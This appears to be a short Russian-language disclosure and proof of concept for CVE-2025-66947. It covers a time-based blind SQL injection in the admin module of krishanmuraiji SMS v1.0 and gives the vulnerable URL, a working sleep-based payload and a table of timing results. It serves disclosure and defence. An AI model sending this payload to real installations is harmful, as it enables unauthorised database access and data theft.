
SQL-инъекция в krishanmuraiji SMS v1.0 (CVE-2025-66947)
⏱️ Визуальное сравнение: нормальный ответ vs задержка ~6 секунд
Кратко: GET-параметр в модуле администратора позволяет выполнить time-based SQL-инъекцию через задержки ответа.
В krishanmuraiji SMS v1.0 существует уязвимость слепой SQL-инъекции на основе времени (Time based blind SQL injection) из-за некорректной проверки GET-параметра в административном модуле.
/studentms/admin/edit-class-detail.phpeditid (GET)/studentms/admin/edit-class-detail.php?editid=12
/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)
| Полезная нагрузка | Задержка |
|---|---|
sleep(3) | ~3s |
sleep(6) | ~6s |
sleep(15) | ~15s |
Последовательная задержка = SQL-инъекция подтверждена
Этот паттерн уязвимости часто встречается в:
Даже если требуется аутентификация и ошибки скрыты,
Time-based SQL-инъекция остаётся эксплуатируемой и опасной.
Серьёзность: Высокая
CVE-2025-66947
Ranjan KumarДанное PoC предоставлено только в образовательных и защитных целях.
CVE-2025-66947, SQL Injection, Time-Based Blind SQL Injection, PHP, Admin Panel